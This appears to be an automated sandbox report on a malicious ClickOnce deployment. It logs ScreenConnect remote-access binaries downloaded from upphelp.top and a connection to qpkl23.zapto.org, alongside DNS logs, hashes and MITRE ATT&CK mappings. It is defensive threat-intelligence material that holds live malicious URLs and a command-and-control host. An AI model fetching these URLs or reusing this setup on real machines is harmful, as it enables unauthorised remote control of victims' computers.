GET https://upphelp.top/Bin/ScreenConnect.Client.manifest

HTTP Response

200

HTTP Request

GET https://upphelp.top/Bin/ScreenConnect.ClientService.exe

HTTP Response

200

HTTP Request

GET https://upphelp.top/Bin/ScreenConnect.WindowsBackstageShell.exe

HTTP Response

200

HTTP Request

GET https://upphelp.top/Bin/ScreenConnect.WindowsFileManager.exe.config

HTTP Response

200

HTTP Request

GET https://upphelp.top/Bin/ScreenConnect.WindowsClient.exe.config

HTTP Response

200

HTTP Request

GET https://upphelp.top/Bin/ScreenConnect.WindowsBackstageShell.exe.config

HTTP Response

200

HTTP Request

GET https://upphelp.top/Bin/ScreenConnect.WindowsFileManager.exe

HTTP Response

200

HTTP Request

GET https://upphelp.top/Bin/ScreenConnect.Client.dll

HTTP Response

200

HTTP Request

GET https://upphelp.top/Bin/ScreenConnect.ClientService.dll

HTTP Response

200

HTTP Request

GET https://upphelp.top/Bin/ScreenConnect.Windows.dll

HTTP Response

200

HTTP Request

GET https://upphelp.top/Bin/ScreenConnect.WindowsClient.exe

HTTP Response

200

HTTP Request

GET https://upphelp.top/Bin/ScreenConnect.Core.dll

HTTP Response

200
150.171.28.10:443

https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=a2d349e4c4a54727a4bab141287b077d&localId=w:B1F9B991-31A2-6777-EDEA-FA7B5FB14F41&deviceId=6825841072347551&anid=

tls, http2

3.0kB
11.4kB
30
21

HTTP Request

GET https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=a2d349e4c4a54727a4bab141287b077d&localId=w:B1F9B991-31A2-6777-EDEA-FA7B5FB14F41&deviceId=6825841072347551&anid=

HTTP Response

204

HTTP Request

GET https://g.bing.com/neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=a2d349e4c4a54727a4bab141287b077d&localId=w:B1F9B991-31A2-6777-EDEA-FA7B5FB14F41&deviceId=6825841072347551&anid=

HTTP Response

204

HTTP Request

GET https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=a2d349e4c4a54727a4bab141287b077d&localId=w:B1F9B991-31A2-6777-EDEA-FA7B5FB14F41&deviceId=6825841072347551&anid=

HTTP Response

204
79.110.49.196:8041

qpkl23.zapto.org

ScreenConnect.ClientService.exe

810 B
302 B
9
6
150.171.27.10:443

tse1.mm.bing.net

tls, http2

1.2kB
6.9kB
15
13
150.171.27.10:443

tse1.mm.bing.net

tls, http2

1.2kB
6.9kB
15
12
150.171.27.10:443

tse1.mm.bing.net

tls, http2

1.2kB
6.9kB
15
13
150.171.27.10:443

https://tse1.mm.bing.net/th?id=OADD2.10239360505011_123FH55PMWQ5EA6JP&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90

tls, http2

117.8kB
3.4MB
2492
2487

HTTP Request

GET https://tse1.mm.bing.net/th?id=OADD2.10239360504960_1PLAHYZB4JQO28JRC&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90

HTTP Request

GET https://tse1.mm.bing.net/th?id=OADD2.10239339388115_1OIS3ERNXZ6FC49JX&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90

HTTP Request

GET https://tse1.mm.bing.net/th?id=OADD2.10239340418596_1ZW2YDLAK01V77NJD&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90

HTTP Request

GET https://tse1.mm.bing.net/th?id=OADD2.10239340418595_19TRV8HP5YIGTZD3I&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90

HTTP Request

GET https://tse1.mm.bing.net/th?id=OADD2.10239339388116_1HBZ24TGK6VST5MLJ&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Request

GET https://tse1.mm.bing.net/th?id=OADD2.10239360505011_123FH55PMWQ5EA6JP&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90

HTTP Response

200

HTTP Response

200
150.171.27.10:443

tse1.mm.bing.net

tls, http2

1.2kB
6.9kB
15
13

8.8.8.8:53

upphelp.top

dns

dfsvc.exe

57 B
73 B
1
1

DNS Request

upphelp.top

DNS Response

79.110.49.196
8.8.8.8:53

8.8.8.8.in-addr.arpa

dns

66 B
90 B
1
1

DNS Request

8.8.8.8.in-addr.arpa
8.8.8.8:53

g.bing.com

dns

168 B
148 B
3
1

DNS Request

g.bing.com

DNS Request

g.bing.com

DNS Request

g.bing.com

DNS Response

150.171.28.10

150.171.27.10
8.8.8.8:53

74.32.126.40.in-addr.arpa

dns

71 B
157 B
1
1

DNS Request

74.32.126.40.in-addr.arpa
8.8.8.8:53

196.49.110.79.in-addr.arpa

dns

72 B
132 B
1
1

DNS Request

196.49.110.79.in-addr.arpa
8.8.8.8:53

95.221.229.192.in-addr.arpa

dns

73 B
144 B
1
1

DNS Request

95.221.229.192.in-addr.arpa
8.8.8.8:53

172.210.232.199.in-addr.arpa

dns

74 B
128 B
1
1

DNS Request

172.210.232.199.in-addr.arpa
8.8.8.8:53

88.156.103.20.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

88.156.103.20.in-addr.arpa
8.8.8.8:53

53.210.109.20.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

53.210.109.20.in-addr.arpa
8.8.8.8:53

240.221.184.93.in-addr.arpa

dns

73 B
144 B
1
1

DNS Request

240.221.184.93.in-addr.arpa
8.8.8.8:53

206.23.85.13.in-addr.arpa

dns

71 B
145 B
1
1

DNS Request

206.23.85.13.in-addr.arpa
8.8.8.8:53

75.117.19.2.in-addr.arpa

dns

70 B
133 B
1
1

DNS Request

75.117.19.2.in-addr.arpa
8.8.8.8:53

qpkl23.zapto.org

dns

ScreenConnect.ClientService.exe

62 B
78 B
1
1

DNS Request

qpkl23.zapto.org

DNS Response

79.110.49.196
8.8.8.8:53

29.243.111.52.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

29.243.111.52.in-addr.arpa
8.8.8.8:53

55.36.223.20.in-addr.arpa

dns

71 B
157 B
1
1

DNS Request

55.36.223.20.in-addr.arpa
8.8.8.8:53

tse1.mm.bing.net

dns

62 B
170 B
1
1

DNS Request

tse1.mm.bing.net

DNS Response

150.171.27.10

150.171.28.10
8.8.8.8:53

10.27.171.150.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

10.27.171.150.in-addr.arpa

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Registry

T1112

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

SIP and Trust Provider Hijacking

T1553.003

Credential Access

Discovery

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Apps\2.0\RW1981ZJ.YTC\EC4WJDZT.9PD\manifests\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92.cdf-ms

Filesize
24KB

MD5
3bff7b857a8b5ccb780903e4e9f8465e

SHA1
841ebbf82569a2b5c2fa2c9fa3ddf8e01e6ae8d7

SHA256
3ae149dde86b86ff71a493f91468267549029096d7f93b5cae0420b524df37ab

SHA512
784d94f3790ac53422d2c8ac787b4280bbbbb4bd6009ce47defb3ece54bd2d676b99ee93b1e609b2624e017b0931c8d49c5cedfbd5299509d58b94052760bbe5

Download Submit
C:\Users\Admin\AppData\Local\Apps\2.0\RW1981ZJ.YTC\EC4WJDZT.9PD\manifests\scre..core_4b14c015c87c1ad8_0018.0002_none_5411371a15332106.cdf-ms

Filesize
3KB

MD5
2abf2ffb6b583ec5918c467af0dd9731

SHA1
1a4d8ed5884848577df82e1a7c761ccf88fdfdb1

SHA256
d483f12f388f801037ef92761f53a5452fdcf362d4fda64390e2aa84eeb6b0d5

SHA512
9a2dc76525a18bc8e009715cdfc6dbe44603513c340f6c6de8d7dca7677e816e5c5ca8b07e76786aa9ff4be9030e4321e2598620d3319cdd9d6b28cb3f561979

Download Submit
C:\Users\Admin\AppData\Local\Apps\2.0\RW1981ZJ.YTC\EC4WJDZT.9PD\manifests\scre..dows_4b14c015c87c1ad8_0018.0002_none_58890efb51813436.cdf-ms

Filesize
5KB

MD5
0a60c6abc0287591ffd6e73ff7ff18b1

SHA1
fa4af656314d47938d10efa5356896e1d9da84b6

SHA256
4163a05061cd5f3a926c21d32bc9a0c32242dedd60d767ea2ba778363a6067c8

SHA512
c4e94809ece652b08ff2763f64e6a7a977a67d3ffc2d899d2ae2b7379a22b196e74ef9032380350509410eea3dc18e93dc94b33d907e04d311f7af6e546e0f1d

Download Submit
C:\Users\Admin\AppData\Local\Apps\2.0\RW1981ZJ.YTC\EC4WJDZT.9PD\manifests\scre..ient_4b14c015c87c1ad8_0018.0002_none_b558103dfe170413.cdf-ms

Filesize
6KB

MD5
c3ae416ab198d42ef07c020dbc165729

SHA1
19e8e7b3b913dad6c582f1a8d125b0bc7fdf4153

SHA256
1ff25b0d1528ac1c5efa1698a19678787159eb9720eb64ab248bc2c6dd53bfec

SHA512
091aab1c08a14ec0225b92131c0776c8062f6a150e3d54c8c8c67ee7961b9948024786a17388122fee4bfe6ca10820e1bfcc69c3da0608eaaf97b8e743cb77d7

Download Submit
C:\Users\Admin\AppData\Local\Apps\2.0\RW1981ZJ.YTC\EC4WJDZT.9PD\manifests\scre..ient_4b14c015c87c1ad8_0018.0002_none_ea2694ec2482770a.cdf-ms

Filesize
2KB

MD5
9453588dafb87c630f5f8e27d255d4de

SHA1
b288f27496e5b076e0f4d97773d0994312221333

SHA256
78191840c0b84135cc17ac9df68269a717bb73b9bf6424da766e82d4cd22a510

SHA512
7f50cd511a6137f0e2d8c462374f6840b8d0f76b5dbfa4b79fd98df7252656d2b7433e79798cef2e06a7f77a51a073e7b1eea2fad9162cdc0a428e8aa287ddbf

Download Submit
C:\Users\Admin\AppData\Local\Apps\2.0\RW1981ZJ.YTC\EC4WJDZT.9PD\manifests\scre..tion_25b0fbb6ef7eb094_0018.0002_none_399c0f24bfe6e975.cdf-ms

Filesize
14KB

MD5
eb94822e4a46aacf1ed71121e8eae65c

SHA1
e364316094cc66c148094f31dc36e9af246ca778

SHA256
3b5db90e505bc36c6abb6208169c1f216e30e405dc789c4bb052403555427647

SHA512
0d17e3d8b91d80e70d436a7bd9333426bd8a429cc4c9525734eeb11b5e66674886ea4b6c62d64a6d2248440a1afcfb6c06a9c088f85f8f9c8068ff38a05afc86

Download Submit
C:\Users\Admin\AppData\Local\Apps\2.0\RW1981ZJ.YTC\EC4WJDZT.9PD\manifests\scre..vice_4b14c015c87c1ad8_0018.0002_none_0564cf62aaf28471.cdf-ms

Filesize
4KB

MD5
25146757f8098eb129e92f0de59e00d5

SHA1
590205ead0b22d2fc7937cd3d2b7c0567ca50414

SHA256
d38f152997dab583ecb0c28ae74db640d923b003f7a6c05089cb67f0a9b720f7

SHA512
e13d81aa66922c7dc5e124bbe27fdbb2ae7ca251497f876c60322c48d338fa135f0df908e323e02538f7342613340c5b9d73799945e831a4ed80b6897dacbf8f

Download Submit
C:\Users\Admin\AppData\Local\Apps\2.0\RW1981ZJ.YTC\EC4WJDZT.9PD\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.ClientService.exe

Filesize
93KB

MD5
361bcc2cb78c75dd6f583af81834e447

SHA1
1e2255ec312c519220a4700a079f02799ccd21d6

SHA256
512f9d035e6e88e231f082cc7f0ff661afa9acc221cf38f7ba3721fd996a05b7

SHA512
94ba891140e7ddb2efa8183539490ac1b4e51e3d5bd0a4001692dd328040451e6f500a7fc3da6c007d9a48db3e6337b252ce8439e912d4fe7adc762206d75f44

Download Submit
C:\Users\Admin\AppData\Local\Apps\2.0\RW1981ZJ.YTC\EC4WJDZT.9PD\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\Client.Override.en-US.resources

Filesize
289B

MD5
5a9944427c35328cb2d7e201cd705c32

SHA1
c58f7761a80cc65e12cc48ad459151dd7e02b2ea

SHA256
333cf59f6d5e060600bd0e001643fecc11e91743a9757ab2192c4cf9b3cb6c01

SHA512
af0132f5d7da2fdc869bd4889700fb4f3a8017159931cbe7861251c1b33ea4fa28331e1059e129c4ba6af9878a1367ba531d412ae9dc13f143edebc6855114d0

Download Submit
C:\Users\Admin\AppData\Local\Apps\2.0\RW1981ZJ.YTC\EC4WJDZT.9PD\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\Client.Override.resources

Filesize
257B

MD5
c72d7889b5e0bb8ac27b83759f108bd8

SHA1
2becc870db304a8f28faab199ae6834b97385551

SHA256
3b231ff84cbcbb76390bd9560246bed20b5f3182a89eaf1d691cb782e194b96e

SHA512
2d38a847e6dd5ad146bd46de88b9f37075c992e50f9d04ccef96f77a1e21f852599a57ce2360e71b99a1ccbc5e3750d37fdb747267ea58a9b76122083fb6a390

Download Submit
C:\Users\Admin\AppData\Local\Apps\2.0\RW1981ZJ.YTC\EC4WJDZT.9PD\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\Client.en-US.resources

Filesize
48KB

MD5
d524e8e6fd04b097f0401b2b668db303

SHA1
9486f89ce4968e03f6dcd082aa2e4c05aef46fcc

SHA256
07d04e6d5376ffc8d81afe8132e0aa6529cccc5ee789bea53d56c1a2da062be4

SHA512
e5bc6b876affeb252b198feb8d213359ed3247e32c1f4bfc2c5419085cf74fe7571a51cad4eaaab8a44f1421f7ca87af97c9b054bdb83f5a28fa9a880d4efde5

Download Submit
C:\Users\Admin\AppData\Local\Apps\2.0\RW1981ZJ.YTC\EC4WJDZT.9PD\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\Client.resources

Filesize
26KB

MD5
5cd580b22da0c33ec6730b10a6c74932

SHA1
0b6bded7936178d80841b289769c6ff0c8eead2d

SHA256
de185ee5d433e6cfbb2e5fcc903dbd60cc833a3ca5299f2862b253a41e7aa08c

SHA512
c2494533b26128fbf8149f7d20257d78d258abffb30e4e595cb9c6a742f00f1bf31b1ee202d4184661b98793b9909038cf03c04b563ce4eca1e2ee2dec3bf787

Download Submit
C:\Users\Admin\AppData\Local\Apps\2.0\RW1981ZJ.YTC\EC4WJDZT.9PD\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\app.config

Filesize
1KB

MD5
2744e91bb44e575ad8e147e06f8199e3

SHA1
6795c6b8f0f2dc6d8bd39f9cf971bab81556b290

SHA256
805e6e9447a4838d874d84e6b2cdff93723641b06726d8ee58d51e8b651cd226

SHA512
586edc48a71fa17cdf092a95d27fce2341c023b8ea4d93fa2c86ca9b3b3e056fd69bd3644edbad1224297bce9646419036ea442c93778985f839e14776f51498

Download Submit
C:\Users\Admin\AppData\Local\Apps\2.0\RW1981ZJ.YTC\EC4WJDZT.9PD\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\user.config

Filesize
565B

MD5
6dbc62005688cd72f38049c2722e4ff5

SHA1
eccd569adbde97455b2c041932ef70b569d30106

SHA256
4510625f7129d91c74e14ad78140334b8365390dc3f6a2d55a406cfaf39932be

SHA512
4aca77693fdc8f146db7944f36303e30ca9cf6e22961b887d3e6960686c2420668272e9ce981984eaa29ca755c23bdfe56f26662ebec616357c230d1f3d4db8a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\ScreenConnect.WindowsClient.exe.log

Filesize
1KB

MD5
efd934620fb989581d19963e3fbb6d58

SHA1
63b103bb53e254a999eb842ef90462f208e20162

SHA256
3af88293fb19b74f43b351ed49ccc031727f389c7ca509eece181da5763a492f

SHA512
6061817547280c5cf5d2cd50fa76b92aa9c1cfc433f17d6b545192e1098281394562adb773931cecd15d1b594d3b9c03855b70682fe6c54df5912c185b54670b

Download Submit
C:\Users\Admin\AppData\Local\Temp\Deployment\5YEM4B7D.NG0\RVG5LQ76.BAB.application

Filesize
115KB

MD5
4e152d84c20ab6330ff0cf47a9af7c6d

SHA1
018f32d833124056fccfc200318542687d0e5565

SHA256
5668723c31f6726947dfeda324b26d27f7e899647c22a4b1b2bea935ba8a6b10

SHA512
2f3f6b397072b795c74c44f19012483e2785ddee5a7f5d7e38c566ebc9a94ae084504061f697db714b933b79824cbc6b08b7718536a19fa21d11ad8d0f8afb79

Download Submit
C:\Users\Admin\AppData\Local\Temp\Deployment\BP3R1XQ5.KWV\81BX7PYH.VO9\ScreenConnect.Client.dll

Filesize
192KB

MD5
ae0e6eba123683a59cae340c894260e9

SHA1
35a6f5eb87179eb7252131a881a8d5d4d9906013

SHA256
d37f58aae6085c89edd3420146eb86d5a108d27586cb4f24f9b580208c9b85f1

SHA512
1b6d4ad78c2643a861e46159d5463ba3ec5a23a2a3de1575e22fdcccd906ee4e9112d3478811ab391a130fa595306680b8608b245c1eecb11c5bce098f601d6b

Download Submit
C:\Users\Admin\AppData\Local\Temp\Deployment\BP3R1XQ5.KWV\81BX7PYH.VO9\ScreenConnect.Client.dll.genman

Filesize
1KB

MD5
2ea1ac1e39b8029aa1d1cebb1079c706

SHA1
5788c00093d358f8b3d8a98b0bef5d0703031e3f

SHA256
8965728d1e348834e3f1e2502061dfb9db41478acb719fe474fa2969078866e7

SHA512
6b2a8ac25bbfe4d1ec7b9a9af8fe7e6f92c39097bcfd7e9e9be070e1a56718ebefffa5b24688754724edbffa8c96dcfcaa0c86cc849a203c1f5423e920e64566

Download Submit
C:\Users\Admin\AppData\Local\Temp\Deployment\BP3R1XQ5.KWV\81BX7PYH.VO9\ScreenConnect.ClientService.dll

Filesize
66KB

MD5
0402cf8ae8d04fcc3f695a7bb9548aa0

SHA1
044227fa43b7654032524d6f530f5e9b608e5be4

SHA256
c76f1f28c5289758b6bd01769c5ebfb519ee37d0fa8031a13bb37de83d849e5e

SHA512
be4cbc906ec3d189bebd948d3d44fcf7617ffae4cc3c6dc49bf4c0bd809a55ce5f8cd4580e409e5bce7586262fbaf642085fa59fe55b60966db48d81ba8c0d78

Download Submit
C:\Users\Admin\AppData\Local\Temp\Deployment\BP3R1XQ5.KWV\81BX7PYH.VO9\ScreenConnect.ClientService.dll.genman

Filesize
1KB

MD5
e11e5d85f8857144751d60ced3fae6d7

SHA1
7e0ae834c6b1dea46b51c3101852afeea975d572

SHA256
ed9436cba40c9d573e7063f2ac2c5162d40bfd7f7fec4af2beed954560d268f9

SHA512
5a2ccf4f02e5acc872a8b421c3611312a3608c25ec7b28a858034342404e320260457bd0c30eaefef6244c0e3305970ac7d9fc64ece8f33f92f8ad02d4e5fab0

Download Submit
C:\Users\Admin\AppData\Local\Temp\Deployment\BP3R1XQ5.KWV\81BX7PYH.VO9\ScreenConnect.Core.dll

Filesize
536KB

MD5
16c4f1e36895a0fa2b4da3852085547a

SHA1
ab068a2f4ffd0509213455c79d311f169cd7cab8

SHA256
4d4bf19ad99827f63dd74649d8f7244fc8e29330f4d80138c6b64660c8190a53

SHA512
ab4e67be339beca30cab042c9ebea599f106e1e0e2ee5a10641beef431a960a2e722a459534bdc7c82c54f523b21b4994c2e92aa421650ee4d7e0f6db28b47ba

Download Submit
C:\Users\Admin\AppData\Local\Temp\Deployment\BP3R1XQ5.KWV\81BX7PYH.VO9\ScreenConnect.Core.dll.genman

Filesize
1KB

MD5
2343364bac7a96205eb525addc4bbfd1

SHA1
9cba0033acb4af447772cd826ec3a9c68d6a3ccc

SHA256
e9d6a0964fbfb38132a07425f82c6397052013e43feedcdc963a58b6fb9148e7

SHA512
ab4d01b599f89fe51b0ffe58fc82e9ba6d2b1225dbe8a3ce98f71dce0405e2521fca7047974bafb6255e675cd9b3d8087d645b7ad33d2c6b47b02b7982076710

Download Submit
C:\Users\Admin\AppData\Local\Temp\Deployment\BP3R1XQ5.KWV\81BX7PYH.VO9\ScreenConnect.Windows.dll

Filesize
1.6MB

MD5
9f823778701969823c5a01ef3ece57b7

SHA1
da733f482825ec2d91f9f1186a3f934a2ea21fa1

SHA256
abca7cf12937da14c9323c880ec490cc0e063d7a3eef2eac878cd25c84cf1660

SHA512
ffc40b16f5ea2124629d797dc3a431beb929373bfa773c6cddc21d0dc4105d7360a485ea502ce8ea3b12ee8dca8275a0ec386ea179093af3aa8b31b4dd3ae1ca

Download Submit
C:\Users\Admin\AppData\Local\Temp\Deployment\BP3R1XQ5.KWV\81BX7PYH.VO9\ScreenConnect.Windows.dll.genman

Filesize
1KB

MD5
50fc8e2b16cc5920b0536c1f5dd4aeae

SHA1
6060c72b1a84b8be7bac2acc9c1cebd95736f3d6

SHA256
95855ef8e55a75b5b0b17207f8b4ba9370cd1e5b04bcd56976973fd4e731454a

SHA512
bd40e38cac8203d8e33f0f7e50e2cab9cfb116894d6ca2d2d3d369e277d93cda45a31e8345afc3039b20dd4118dc8296211badffa3f1b81e10d14298dd842d05

Download Submit
C:\Users\Admin\AppData\Local\Temp\Deployment\BP3R1XQ5.KWV\81BX7PYH.VO9\ScreenConnect.WindowsBackstageShell.exe

Filesize
59KB

MD5
6df2def5e591e2481e42924b327a9f15

SHA1
38eab6e9d99b5caeec9703884d25be8d811620a9

SHA256
b6a05985c4cf111b94a4ef83f6974a70bf623431187691f2d4be0332f3899da9

SHA512
5724a20095893b722e280dbf382c9bfbe75dd4707a98594862760cbbd5209c1e55eeaf70ad23fa555d62c7f5e54de1407fb98fc552f42dccba5d60800965c6a5

Download Submit
C:\Users\Admin\AppData\Local\Temp\Deployment\BP3R1XQ5.KWV\81BX7PYH.VO9\ScreenConnect.WindowsClient.exe

Filesize
587KB

MD5
20ab8141d958a58aade5e78671a719bf

SHA1
f914925664ab348081dafe63594a64597fb2fc43

SHA256
9cfd2c521d6d41c3a86b6b2c3d9b6a042b84f2f192f988f65062f0e1bfd99cab

SHA512
c5dd5ed90c516948d3d8c6dfa3ca7a6c8207f062883ba442d982d8d05a7db0707afec3a0cb211b612d04ccd0b8571184fc7e81b2e98ae129e44c5c0e592a5563

Download Submit
C:\Users\Admin\AppData\Local\Temp\Deployment\BP3R1XQ5.KWV\81BX7PYH.VO9\ScreenConnect.WindowsClient.exe.config

Filesize
266B

MD5
728175e20ffbceb46760bb5e1112f38b

SHA1
2421add1f3c9c5ed9c80b339881d08ab10b340e3

SHA256
87c640d3184c17d3b446a72d5f13d643a774b4ecc7afbedfd4e8da7795ea8077

SHA512
fb9b57f4e6c04537e8fdb7cc367743c51bf2a0ad4c3c70dddab4ea0cf9ff42d5aeb9d591125e7331374f8201cebf8d0293ad934c667c1394dc63ce96933124e7

Download Submit
C:\Users\Admin\AppData\Local\Temp\Deployment\BP3R1XQ5.KWV\81BX7PYH.VO9\ScreenConnect.WindowsClient.exe.genman

Filesize
2KB

MD5
3133de245d1c278c1c423a5e92af63b6

SHA1
d75c7d2f1e6b49a43b2f879f6ef06a00208eb6dc

SHA256
61578953c28272d15e8db5fd1cffb26e7e16b52ada7b1b41416232ae340002b7

SHA512
b22d4ec1d99fb6668579fa91e70c182bec27f2e6b4ff36223a018a066d550f4e90aac3dffd8c314e0d99b9f67447613ca011f384f693c431a7726ce0665d7647

Download Submit
C:\Users\Admin\AppData\Local\Temp\Deployment\BP3R1XQ5.KWV\81BX7PYH.VO9\ScreenConnect.WindowsClient.exe.manifest

Filesize
17KB

MD5
1dc9dd74a43d10c5f1eae50d76856f36

SHA1
e4080b055dd3a290db546b90bcf6c5593ff34f6d

SHA256
291fa1f674be3ca15cfbab6f72ed1033b5dd63bcb4aea7fbc79fdcb6dd97ac0a

SHA512
91e8a1a1aea08e0d3cf20838b92f75fa7a5f5daca9aead5ab7013d267d25d4bf3d291af2ca0cce8b73027d9717157c2c915f2060b2262bac753bbc159055dbdf

Download Submit
C:\Users\Admin\AppData\Local\Temp\Deployment\BP3R1XQ5.KWV\81BX7PYH.VO9\ScreenConnect.WindowsFileManager.exe

Filesize
79KB

MD5
b1799a5a5c0f64e9d61ee4ba465afe75

SHA1
7785da04e98e77fec7c9e36b8c68864449724d71

SHA256
7c39e98beb59d903bc8d60794b1a3c4ce786f7a7aae3274c69b507eba94faa80

SHA512
ad8c810d7cc3ea5198ee50f0ceb091a9f975276011b13b10a37306052697dc43e58a16c84fa97ab02d3927cd0431f62aef27e500030607828b2129f305c27be8

Download Submit
memory/1004-385-0x00000000052F0000-0x000000000537C000-memory.dmp

Filesize
560KB

Download
memory/1004-380-0x0000000002D90000-0x0000000002DA8000-memory.dmp

Filesize
96KB

Download
memory/2720-413-0x0000000002480000-0x0000000002498000-memory.dmp

Filesize
96KB

Download
memory/4052-348-0x0000000000080000-0x0000000000116000-memory.dmp

Filesize
600KB

Download
memory/4464-404-0x0000000004170000-0x0000000004202000-memory.dmp

Filesize
584KB

Download
memory/4464-403-0x0000000003EA0000-0x0000000003ED6000-memory.dmp

Filesize
216KB

Download
memory/4464-400-0x0000000003E50000-0x0000000003EA0000-memory.dmp

Filesize
320KB

Download
memory/4464-399-0x0000000004680000-0x0000000004C24000-memory.dmp

Filesize
5.6MB

Download
memory/4464-398-0x0000000003F20000-0x00000000040CA000-memory.dmp

Filesize
1.7MB

Download
memory/4756-10-0x0000023538340000-0x0000023538390000-memory.dmp

Filesize
320KB

Download
memory/4756-52-0x000002353AC00000-0x000002353ADAA000-memory.dmp

Filesize
1.7MB

Download
memory/4756-7-0x00007FFC4AED0000-0x00007FFC4B991000-memory.dmp

Filesize
10.8MB

Download
memory/4756-64-0x000002353A930000-0x000002353A9BC000-memory.dmp

Filesize
560KB

Download
memory/4756-30-0x00007FFC4AED0000-0x00007FFC4B991000-memory.dmp

Filesize
10.8MB

Download
memory/4756-40-0x00000235383D0000-0x0000023538406000-memory.dmp

Filesize
216KB

Download
memory/4756-46-0x0000023538390000-0x00000235383A8000-memory.dmp

Filesize
96KB

Download
memory/4756-0-0x00007FFC4AED3000-0x00007FFC4AED5000-memory.dmp

Filesize
8KB

Download
memory/4756-6-0x00007FFC4AED0000-0x00007FFC4B991000-memory.dmp

Filesize
10.8MB

Download
memory/4756-5-0x00007FFC4AED3000-0x00007FFC4AED5000-memory.dmp

Filesize
8KB

Download
memory/4756-4-0x00007FFC4AED0000-0x00007FFC4B991000-memory.dmp

Filesize
10.8MB

Download
memory/4756-3-0x00007FFC4AED0000-0x00007FFC4B991000-memory.dmp

Filesize
10.8MB

Download
memory/4756-2-0x00000235368E0000-0x0000023536A66000-memory.dmp

Filesize
1.5MB

Download
memory/4756-58-0x000002353A940000-0x000002353A9D6000-memory.dmp

Filesize
600KB

Download
memory/4756-1-0x000002351C3A0000-0x000002351C3A8000-memory.dmp

Filesize
32KB

Download
memory/4756-416-0x00007FFC4AED0000-0x00007FFC4B991000-memory.dmp

Filesize
10.8MB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Request

HTTP Request

HTTP Request

HTTP Request

HTTP Response

HTTP Response

HTTP Response

HTTP Response

HTTP Request

HTTP Response

HTTP Response

DNS Request

DNS Response

DNS Request

DNS Request

DNS Request

DNS Request

DNS Response

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Response

DNS Request

DNS Request

DNS Request

DNS Response

DNS Request

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

We care about your privacy.